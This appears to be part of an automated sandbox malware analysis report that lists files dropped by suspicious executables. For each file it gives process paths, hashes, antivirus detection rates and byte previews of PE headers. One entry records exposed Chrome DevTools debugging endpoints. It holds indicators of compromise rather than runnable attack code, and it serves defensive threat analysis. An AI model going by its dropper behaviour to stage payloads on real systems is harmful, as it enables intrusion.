                                                                                                                                                                                                                                              SHA-512:CBB5725AEC54AEB48FAF72C5D2E437D610645411298D37F6503EBFBFA41BE261FFBD903D64633A8DC6EEDB47F747958FC82DD6893A19C38AB9904C1CF18895EC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.<.#... .......A.......X\...;...{......................0.!..........{A."....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.................................../.."....|....................."....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                              Entropy (8bit):0.07694654765132056
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Ql8YewgZuajn13a/JJnHlallcVO/lnlZMxZNQl:Q6zbZua53qJJHAOewk
                                                                                                                                                                                                                                              MD5:2CAF4E38A552727C915DE7B59B07053C
                                                                                                                                                                                                                                              SHA1:2F2BF5A2E4663D161FB73B26F30626D0F7E1A959
                                                                                                                                                                                                                                              SHA-256:F374F0E02AEC56A2B5699043E5D6905FA16F3F9BD285A76418F9E3CCCA6F6BC3
                                                                                                                                                                                                                                              SHA-512:3D2046DFAB202CCDCC832B7A564AF09B86333F6AF094C4E330D444519FEF92E8279A09F674855CF79297FA2A65A05548EBAE5EEBD28A285BB2FFB6B5054F54D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..T......................................;...{.."....|.......{A..............{A......{A..........{A]..................."....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):692736
                                                                                                                                                                                                                                              Entropy (8bit):6.304379785339226
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                                                                                                                                                                              MD5:EDA18948A989176F4EEBB175CE806255
                                                                                                                                                                                                                                              SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                                                                                                                                                                              SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                                                                                                                                                                              SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: czxw4iVMHJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: JHPvqMzKbz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: F2Y5tbGngK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: o3QbCA4xLs.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):685392
                                                                                                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: czxw4iVMHJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: JHPvqMzKbz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: lkIbbNB9ba.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: o3QbCA4xLs.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):608080
                                                                                                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):256000
                                                                                                                                                                                                                                              Entropy (8bit):6.5457370285015966
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:M+TPa9FQSnZndg9lxwKzjhzJr573n7LBVb1B+3TqvOymozCvyOvXtheOkc6lpyvC:McPa9C9VbL+3Omy5CvyOvzeOKT
                                                                                                                                                                                                                                              MD5:E303F635CA871A0E37D76971E3AE9903
                                                                                                                                                                                                                                              SHA1:71E01934E94867F05CDD0977E25645473780FCB1
                                                                                                                                                                                                                                              SHA-256:C46CB31DC7912C217C85E28330637BCE0E642E4E225A19AF9FDA4AAFA1ED45CC
                                                                                                                                                                                                                                              SHA-512:210BBBCE0E649549CE6EBBE09D607711F0F6588C494DB26AA74ABD61CDAA61379128248EA08E5CDF827DEA0D09DF2D44E1F12AC962E40698771A442047E2DF82
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):226
                                                                                                                                                                                                                                              Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                              MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):223704
                                                                                                                                                                                                                                              Entropy (8bit):6.478282624362907
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:dWlUVdUEs9Wla/eLOCoTo1txKWT2FEFX0/UMTwTh2OCgazMznRVJogh4ydDeuw42:dWTKa/OtxKcrxaUMWRjDh4C6uTte
                                                                                                                                                                                                                                              MD5:54F4EBCE5C56BF86C5948D89BA8C875F
                                                                                                                                                                                                                                              SHA1:8DA1E1B95CBBA3E9A50BA999D3D1EA64CC2B358E
                                                                                                                                                                                                                                              SHA-256:B4A622D3535BBC64DAB4626BF93482A2983A63F77ACD0AE9B6386F51F736376C
                                                                                                                                                                                                                                              SHA-512:05D8429B28C918F402A246E44C83DEA4C11F01F571D6B72D16337C83395D03FEB8A4D14F5F9E7EAF62DD1621A80CA966B3FF3E026E396EEEDB4FDFBD772A3EA8
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%g.....................,.......9... ...@....@.. ....................................`..................................9..S....@...(...........H...!........................................................... ............... ..H............text........ ...................... ..`.rsrc....(...@...*..................@..@.reloc...............F..............@..B.................9......H.......4...d+..............c.......................................................................................................................................................:.(-.....}....*>..(......}....*V..o/....(0.....}....*B...(0.....}....*....(1.....rE..p.....(2...o3........}....*j.rS..p.{....o4......(5...*..{....*....(9...T8......J.XT.J.X(.....(=...-.*"..(....*2.s....(....*J.(....o.....(....*6..s....(....*R..(.....( ....(....*:...s....(....*v...(!....(x.....}.....
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1267
                                                                                                                                                                                                                                              Entropy (8bit):5.367933458560993
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:OBfNaoQoEUKINePKllDQo+BfNaoQORw6RMBYpDQORKBfNaoQ+bOU1UQ+r:SfNaoQBTEQzfNaoQORXRzQORefNaoQdf
                                                                                                                                                                                                                                              MD5:6CD78402C1E00817590B3B643795C26B
                                                                                                                                                                                                                                              SHA1:818E6580C592A98DA252F5108DD9EFA2455B70D4
                                                                                                                                                                                                                                              SHA-256:765B91CA38BA783FCF7D4382ECFEDCB33A9B08FEB5FD69B03214047E998D2030
                                                                                                                                                                                                                                              SHA-512:F49FEF76FF121FFC72D5D58BC9BE0780FB4AA66B92FC6B0F436C07436CFBE9C074823057B3CC0D017D4D4120AEA98194D6926EE38C1EF87FE2248B1D7B044B38
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/6F7EA3F7F9A920052426AF8C3B0EFEC7",.. "id": "6F7EA3F7F9A920052426AF8C3B0EFEC7",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/6F7EA3F7F9A920052426AF8C3B0EFEC7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/5550B9FD03B71F6D465F8C802379B985",.. "id": "5550B9FD03B71F6D465F8C802379B985",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/5550B9FD03B71F6D465F8C802379B985"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2866688
                                                                                                                                                                                                                                              Entropy (8bit):6.494213416290658
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:t5ZZQ5qtYXNzHTOl88780cMTwCLKxEnT28f:t5ZZQ5qyXNzHTOl8XMwCLKCnyO
                                                                                                                                                                                                                                              MD5:01DDF9CC770BC558B2FAFFA43B9B5B12
                                                                                                                                                                                                                                              SHA1:41300C4536F0F97182BC08207BE6B7E03200D9A7
                                                                                                                                                                                                                                              SHA-256:FE788A81D8D514B8D5DB059A110090498C4CD6A8CCD77A5D6036AE9E603E06B1
                                                                                                                                                                                                                                              SHA-512:49CF6DF07F468D1531C64041419E3B698AACB7E2C872D3310BA58C3BA5E73CED318946FA9CCFAAC506DF1D9EAE3A6AD91E8D0FB41E43153053B4B8F55BB94468
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                              Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... ,.. ...`....@.. .......................`,.....E.,...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...krwtsfss.`+......^+..:..............@...qssevqjd. ....,.......+.............@....taggant.@... ,.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2143744
                                                                                                                                                                                                                                              Entropy (8bit):7.959329929023164
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:/gTKihWoN2xC3miqdOlcZsxJmyfTOQxI0UsGzNLNuLbLujD:YTAoN2E4dO+ZuJmybjI0ULuL
                                                                                                                                                                                                                                              MD5:90CD56BFD041977B953EC0D6AC7F665C
                                                                                                                                                                                                                                              SHA1:C0CBD27BA7367C60BA521CE16056A115EE638EB8
                                                                                                                                                                                                                                              SHA-256:1BA20B045D5B1D94525FCF24264305573278D9584ECBB9C897ADCDEFBFE5EEC4
                                                                                                                                                                                                                                              SHA-512:16DD26329B62E1CFCD6B215D5FF0572F2AC0036125DD447FB06AEF929696A5E6BB8FCEF7A5E5711AF993054848301F1CD1A07752A4FEDB61FE5EFAF4B3448BFB
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,...... s...........@..........................Ps.....+.!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .`*.........................@...onvelaog......Y.....................@...dkmdjfdj......s....... .............@....taggant.0... s..".... .............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):919552
                                                                                                                                                                                                                                              Entropy (8bit):6.584688480979072
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:zqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga/T7:zqDEvCTbMWu7rQYlBQcBiT6rprG8ab7
                                                                                                                                                                                                                                              MD5:C1FA8AC639C1D531A4C7CF311C056AB0
                                                                                                                                                                                                                                              SHA1:1D1C137AD8EA08C6ABDC2CFB8E8F7B7F802499BF
                                                                                                                                                                                                                                              SHA-256:E4187B64BC8D91A8413225D696CF1BDCB08905B1698F8922DF19F88EB7314E08
                                                                                                                                                                                                                                              SHA-512:1836E302213E7CD81B456CD8B711AD18DB360BD4D25636BAF4DB97A8893F5DF486B640603DC69B2DAE567F95D0814C306A3FB86376536A9E2F1143603697DFD6
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...0.%g.........."..........X......w.............@..........................`............@...@.......@.....................d...|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):685392
                                                                                                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):608080
                                                                                                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):256000
                                                                                                                                                                                                                                              Entropy (8bit):6.5457370285015966
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:M+TPa9FQSnZndg9lxwKzjhzJr573n7LBVb1B+3TqvOymozCvyOvXtheOkc6lpyvC:McPa9C9VbL+3Omy5CvyOvzeOKT
                                                                                                                                                                                                                                              MD5:E303F635CA871A0E37D76971E3AE9903
                                                                                                                                                                                                                                              SHA1:71E01934E94867F05CDD0977E25645473780FCB1
                                                                                                                                                                                                                                              SHA-256:C46CB31DC7912C217C85E28330637BCE0E642E4E225A19AF9FDA4AAFA1ED45CC
                                                                                                                                                                                                                                              SHA-512:210BBBCE0E649549CE6EBBE09D607711F0F6588C494DB26AA74ABD61CDAA61379128248EA08E5CDF827DEA0D09DF2D44E1F12AC962E40698771A442047E2DF82
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2964480
                                                                                                                                                                                                                                              Entropy (8bit):6.547019304873906
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:3S4JSuBwINPmACNvfBiKKx2ymGdMOqJ97s+Y:xSuBfNOAoxip2FG6OqJ9NY
                                                                                                                                                                                                                                              MD5:53014E825FFABBC0AC8A0AB1AEC76EE7
                                                                                                                                                                                                                                              SHA1:0C81CBA17F60843F4FC34388E6F07EE969E1B056
                                                                                                                                                                                                                                              SHA-256:F018E69934CDBC05BCE5C6DDAF408409C2FBBBE1BD76E7D586221B0FC077FE2B
                                                                                                                                                                                                                                              SHA-512:7DE026C0324A35DFBD273C329AB5EFBA662B71DEEC2AD8D405A55348C4B2AE6492BD3D74C3BF85133184E66AE834A8D3D8CD195ECB047759088B7FFBEF9F4999
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P0...........@...........................0......y-...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...zjitwqld..*.......*.................@...mduizhsw.....@0.......-.............@....taggant.0...P0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2240
                                                                                                                                                                                                                                              Entropy (8bit):5.37934760551302
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:zWSU4xymI4RfoUeW+gZ9tK8NPP8xL7u1iMuge//ZSUyuE:zLHxvIIwLgZ2KHuLOugEE
                                                                                                                                                                                                                                              MD5:29D2ADCE1F23E4AD7B0B20BB2EBB403E
                                                                                                                                                                                                                                              SHA1:C282948447DBB92A63E054E2E1E67C6699331746
                                                                                                                                                                                                                                              SHA-256:9E10D418387EA8A5C5F1AFB18F0160877BBCF734263FB2C1E31DE55724B5D0AA
                                                                                                                                                                                                                                              SHA-512:F55590E743B02660232AEC47E7F30D1B4D107B3792E708BB98C9A0DCBB6FBCADB24C6FDDDE1BFC8806E3DD2D316EAD04470D01F8630C59C2D9B4C62E3D8B2D24
                                                                                                                                                                                                                                              Malicious:false
